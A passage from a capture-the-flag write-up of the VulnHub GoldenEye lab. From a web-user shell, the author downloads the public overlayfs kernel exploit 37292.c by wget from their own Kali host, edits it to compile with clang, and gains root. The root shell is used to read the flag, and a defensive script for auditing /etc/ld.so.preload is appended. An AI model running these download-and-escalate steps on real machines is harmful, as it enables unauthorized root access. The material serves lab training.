TX packets:679 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52359 (52.3 KB) TX bytes:1058811 (1.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10760 errors:0 dropped:0 overruns:0 frame:0
TX packets:10760 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6139626 (6.1 MB) TX bytes:6139626 (6.1 MB)
www-data@ubuntu:/$
So Ubuntu 14.04.1 running Linux kernel 3.13.0-32, 64-bit...
I check out the directories in which the site is being hosted.
Looks like I found a new page:
www-data@ubuntu:/var/www/html$ ls -l
ls -l
total 264
drwxr-xr-x 3 www-data www-data 4096 Apr 25 07:29 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
www-data@ubuntu:/var/www/html$ dir 006-final
dir 006-final
sata_drop.webm sata_drop.webm.1 x8vtfinal-flag.gif xvf7-flag
www-data@ubuntu:/var/www/html$
Let's check them in Firefox:
Hahaha nice:
A quick look around and I don't see anything exciting to move me forward...
What else do we have?
www-data@ubuntu:/var/www/html$ ls -la
ls -la
total 272
drwxr-xr-x 6 root root 4096 Apr 29 10:18 .
drwxr-xr-x 4 root root 4096 Apr 23 20:56 ..
drwxr-xr-x 3 www-data www-data 4096 Aug 16 20:53 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
Looking at the root I find sniper.png...
Ahhh makes me wanna play Goldeneye...
Let's check the EXIF data on this one...
Nah nothing...
So I check out splashAdmin.php:
Hard to read, but the line that sounds most interesting is: "For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. I've replaced GCC with this throughout the GolenEye systems. "
I'll keep that in mind. I keep looking through the file system, especially under /var/www, and find some files uploaded through Moodle:
-rw-rw-rw- 1 www-data www-data 168 Apr 23 21:16 warning.txt
./05:
total 4
drwxrwsrwx 2 www-data www-data 4096 Aug 15 19:46 6d
./05/6d:
total 8
-rw-rw-rw- 1 www-data www-data 4795 Aug 15 19:46 056d495e4768cf97825602ed6a1096eab6d67a5a
./82:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 34
./82/34:
total 1496
-rw-rw-rw- 1 www-data www-data 1529575 Apr 24 16:10 82341a17005e75a8f4614ea435acbc3148cf30ea
./a6:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:15 f9
./a6/f9:
total 4
-rw-rw-rw- 1 www-data www-data 3242 Apr 24 16:15 a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
./ad:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 18:28 5c
./ad/5c:
total 4
-rw-rw-rw- 1 www-data www-data 364 Apr 24 18:28 ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
./da:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 39
./da/39:
total 0
-rw-rw-rw- 1 www-data www-data 0 Apr 24 16:10 da39a3ee5e6b4b0d3255bfef95601890afd80709
www-data@ubuntu:/var/www/moodledata/filedir$
The first one is an attempted PHP Moodle exploit I tried previously.
www-data@ubuntu:/var/www/moodledata/filedir/05/6d$ file 82341a17005e75a8f4614ea435acbc3148cf30ea BORIS GIF
82341a17005e75a8f4614ea435acbc3148cf30ea: GIF image data, version 89a, 500 x 278
www-data@ubuntu:/var/www/moodledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d NATALYA GIF
<odledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d: JPEG image data, JFIF standard 1.01
www-data@ubuntu:/var/www/moodledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
<odledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
ad5c3bc9ae900b39509eb2d6a727455e39d77b9b: ASCII text, with CRLF line terminators
That one just contained this text message:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
The last one is empty:
www-data@ubuntu:/var/www/moodledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
<odledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
da39a3ee5e6b4b0d3255bfef95601890afd80709: empty
Nothing fun here...
Going back to the Linux version, let's check what kernel exploits we have available for 3.13.0:
root@kali:~/Documents/vulnhub/goldeneye# searchsploit Linux Kernel 3.13.0
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | exploits/linux/local/37293.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Hmm, let's have a look... I've used this one before. However, it relies on gcc for compiling.
Based on the message I read earlier, a quick Google search: "freebsd gcc equivalent clang"
https://unix.stackexchange.com/questions/49906/why-is-freebsd-deprecating-gcc-in-favor-of-clang-llvm
After a brief read, it seems clang is a compatible compiler... Let's try it!
Host it on my Kali machine:
root@kali:~/Documents/vulnhub/goldeneye# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/Documents/vulnhub/goldeneye# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Download and compile:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292.c
wget http://192.168.111.129/37292.c
--2018-08-19 02:52:53-- http://192.168.111.129/37292.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
100%[======================================>] 5,119 --.-K/s in 0s
2018-08-19 02:52:53 (1013 MB/s) - '37292.c' saved [5119/5119]
www-data@ubuntu:/tmp$ which cc
which cc
/usr/bin/cc
www-data@ubuntu:/tmp$ which clang
which clang
/usr/bin/clang
www-data@ubuntu:/tmp$ clang 37292.c -o a
clang 37292.c -o a
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls
ls
37292.c a vmware-root
www-data@ubuntu:/tmp$
Hmmm, that looked easy?
Let's see...
www-data@ubuntu:/tmp$ ./a
./a
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
www-data@ubuntu:/tmp$
Hmm gcc not found? Let's check the exploit code...
Line 143:
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
I edit this line and replace gcc with clang.
Let's re-download that now:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292_edited.c
wget http://192.168.111.129/37292_edited.c
--2018-08-19 02:58:49-- http://192.168.111.129/37292_edited.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: '37292_edited.c'
100%[======================================>] 5,123 --.-K/s in 0s
2018-08-19 02:58:49 (10.9 MB/s) - '37292_edited.c' saved [5123/5123]
Recompile:
www-data@ubuntu:/tmp$ clang 37292_edited.c -o b
clang 37292_edited.c -o b
37292_edited.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292_edited.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292_edited.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292_edited.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292_edited.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls -l
ls -l
total 76
-rw-rw-rw- 1 www-data www-data 5119 Aug 19 02:47 37292.c
-rw-rw-rw- 1 www-data www-data 5123 Aug 19 02:58 37292_edited.c
-rwxrwxrwx 1 www-data www-data 13773 Aug 19 02:53 a
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:58 a.out
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:59 b
drwxrwxrwx 5 www-data www-data 4096 Aug 19 02:54 ns_sploit
-rwxrwxrwx 1 www-data www-data 418 Aug 19 02:54 ofs-lib.c
drwx------ 2 root root 4096 Aug 19 01:19 vmware-root
Let's see what happens now:
www-data@ubuntu:/tmp$ ./b
./b
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
FINALLY! YES!!!!!
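The lines "/etc/ld.so.preload created" and "creating shared library" above are the noisy part of this exploit: it drops a preload file that makes the loader pull a library out of /tmp into every new process. As an added example from the defender's side (not code from the post or the exploit), a check that parses that file and flags entries that should never be there; the sample content is constructed to match the artifact the output shows.

```python
import os
import stat

PRELOAD_PATH = "/etc/ld.so.preload"
# Directories where an unprivileged user can drop a library.
UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def classify_entry(entry, check_disk=True):
    """Describe why one preload entry is or is not trustworthy."""
    if not entry.startswith("/"):
        return "relative path, resolved at load time"
    if entry.startswith(UNTRUSTED_DIRS):
        return "library lives in a world-writable or user directory"
    if not check_disk:
        return "ok"
    try:
        st = os.stat(entry)
    except FileNotFoundError:
        return "listed library does not exist"
    if st.st_uid != 0 or st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return "library not root-owned or writable by others"
    return "ok"


def audit_preload(content, check_disk=True):
    """Parse ld.so.preload text (whitespace- or colon-separated entries; this
    parser also drops '#' comments) and return (entry, finding) pairs."""
    findings = []
    for raw in content.splitlines():
        line = raw.split("#", 1)[0]
        for entry in line.replace(":", " ").split():
            findings.append((entry, classify_entry(entry, check_disk)))
    return findings


def audit_system(path=PRELOAD_PATH):
    """Audit the real file. On most hosts it does not exist at all, so its mere
    presence is worth an alert before the entries are even looked at."""
    if not os.path.exists(path):
        return None
    with open(path) as f:
        return audit_preload(f.read())


if __name__ == "__main__":
    # Constructed sample mirroring what the exploit output above leaves behind:
    # a preload entry pointing at a library compiled in /tmp.
    SAMPLE = "/tmp/ofs-lib.so\n"
    for entry, finding in audit_preload(SAMPLE, check_disk=False):
        print(f"{entry}: {finding}")
    result = audit_system()
    print("no /etc/ld.so.preload on this host" if result is None else result)
```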
Now for the flag:
# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 19:28 .
drwxr-xr-x 22 root root 4096 Apr 24 21:57 ..
-rw-r--r-- 1 root root 19 May 3 10:08 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 11:00 .cache
-rw------- 1 root root 144 Apr 29 19:16 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 20:23 .rnd
-rw------- 1 root root 8296 Apr 29 10:18 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
Another one down.
I'm going to have to see how much a N64 goes for on eBay now!
--> n33dle